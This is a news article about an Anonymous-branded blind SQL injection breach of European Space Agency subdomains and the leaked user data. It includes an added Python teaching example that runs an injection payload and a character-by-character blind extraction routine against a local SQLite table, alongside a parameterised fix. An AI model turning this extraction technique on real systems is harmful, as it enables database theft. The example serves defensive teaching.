A group of hackers operating under the Anonymous banner hacked the European Space Agency (ESA) and leaked the data for no reason other than for “lulz.” Over 8,000 people will not find anything amusing about the breach since their names, email addresses and passwords were posted in one of three data dumps on JustPaste.it.
The hackers split the compromised records into three separate posts: registered users, database schemas, and ESA collaborators; the last of these is a contact list with hundreds of full names, fax numbers, phone numbers, postal addresses, email addresses and the organization to which each researcher or supporter belongs.
The hackers claim to have taken the data from ESA subdomains such as sci.esa.int, exploration.esa.int and due.esrin.esa.int. Each dump names the targeted ESA subdomains and lists “Motivation: Lulz” as the attackers’ reason for the hacks.
One of the dumps contains more than 8,000 names, email addresses and passwords, which the hackers labelled “oc4_subscribers.” A large share of the leaked passwords are only three characters long, and most of those are three digits. Below are samples of some of the three-digit passwords, without linking to the leak or tying the passwords to user names and email addresses; hopefully no user reused one of them elsewhere, since any decent password policy would reject a three-character password with no mix of letters, digits and symbols.
CSO’s Steve Ragan analyzed the 8,107 exposed passwords and found that 39% (3,191) were three characters long and 16% (1,314) were eight characters long, a length that could easily have been cracked; only 22 passwords were 20 characters long, the longest was 24 characters, and the rest fell somewhere between those extremes.
According to a post that links to the leaks, the hackers used a blind SQL injection vulnerability to gain access to ESA’s database. Why target ESA? One hacker involved in the attack told HackRead:
BECAUSE XMAS IS COMING AND WE HAD TO DO SOMETHING FOR FUN SO WE DID IT FOR THE LULZ.
One of the dumps lists the databases available on the ESA subdomains and the database management system users, along with technical details such as the operating system running on the web servers, the web application technology and the back-end database management system; these ranged from Debian Linux with Apache and MySQL to ColdFusion and Oracle. That combination of OS, web technology and DBMS banner is exactly the fingerprint that automated SQL injection tooling reports once it has a working injection point, which is consistent with the blind SQL injection claim.
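To show what “blind SQL injection” means in practice, and why a page that only answers yes or no is enough to pull the DBMS version and schema names out of a database, here is an added example that is not part of the original article and not ESA’s code. It builds an in-memory SQLite table whose name, oc4_subscribers, is taken from the leak label above; the rows, the hypothetical “are you subscribed?” endpoint and the extraction routine are all constructed for the example. The vulnerable lookup concatenates the email address into the SQL text; the safe version passes it as a bound parameter, and the same extraction loop gets nothing back from it.

```python
import sqlite3

# Constructed sample rows for the example; these are not the leaked records.
SAMPLE_ROWS = [
    ("Ada Example", "ada@example.org", "123"),
    ("Bob Example", "bob@example.org", "456"),
]


def build_db():
    """In-memory stand-in for the subscriber database (table name from the article)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE oc4_subscribers (name TEXT, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO oc4_subscribers VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def is_subscribed_vulnerable(conn, email):
    """Hypothetical yes/no endpoint that splices the input into the SQL string.
    The caller only learns whether a row matched, which is all a blind
    (boolean-based) injection needs."""
    sql = "SELECT 1 FROM oc4_subscribers WHERE email = '%s'" % email
    return conn.execute(sql).fetchone() is not None


def is_subscribed_safe(conn, email):
    """Same check with a bound parameter: the input can never become SQL syntax."""
    sql = "SELECT 1 FROM oc4_subscribers WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone() is not None


def make_oracle(check, conn):
    """Wrap the endpoint as a function answering 'is this SQL condition true?'.
    The payload closes the string literal, ORs in the attacker's condition and
    comments out the rest of the original query."""
    def ask(condition):
        payload = "x' OR (%s) -- " % condition
        return check(conn, payload)
    return ask


def _binary_search(ask, make_condition, lo, hi):
    """Smallest v in [lo, hi] for which 'value > v' is false, i.e. the value itself."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(make_condition(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(ask, expr, max_len=64):
    """Recover the string result of a SQL expression one character at a time,
    using only true/false answers (about 7 requests per character)."""
    length = _binary_search(ask, lambda v: "length((%s)) > %d" % (expr, v), 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = _binary_search(
            ask,
            lambda v, i=i: "unicode(substr((%s),%d,1)) > %d" % (expr, i, v),
            32, 126,
        )
        chars.append(chr(code))
    return "".join(chars)


def demo():
    """Fingerprint the DBMS and enumerate the schema through the vulnerable
    endpoint, then show the parameterised endpoint yields nothing."""
    conn = build_db()
    ask = make_oracle(is_subscribed_vulnerable, conn)
    results = {
        "dbms_version": blind_extract(ask, "sqlite_version()"),
        "first_table": blind_extract(
            ask, "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"),
        "first_password": blind_extract(
            ask, "SELECT password FROM oc4_subscribers LIMIT 1"),
        "via_safe_endpoint": blind_extract(
            make_oracle(is_subscribed_safe, conn), "sqlite_version()"),
    }
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-18s %r" % (key, value))
```

Against the vulnerable lookup the loop returns the real SQLite version string, the table name oc4_subscribers and the first stored password; against the parameterised lookup every oracle query is simply an email address that matches no row, so the length search settles on zero and the result is an empty string. The lesson for defenders is the same one the dump illustrates: once any boolean signal leaks, the whole schema and its contents follow, so the fix is bound parameters everywhere, not hiding error messages.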
The attackers using the Anonymous banner were reportedly the same hackers who previously breached the website of the United Nations Framework Convention on Climate Change and leaked the personal details of 1,415 officials; the same group hacked the World Trade Organization before leaking the database and the personal details of WTO members.
The breach occurred while ESA was in the news for the launch of ESA astronaut Tim Peake, NASA astronaut Tim Kopra and Russian commander Yuri Malenchenko to the International Space Station; the three will spend six months living and working on the ISS.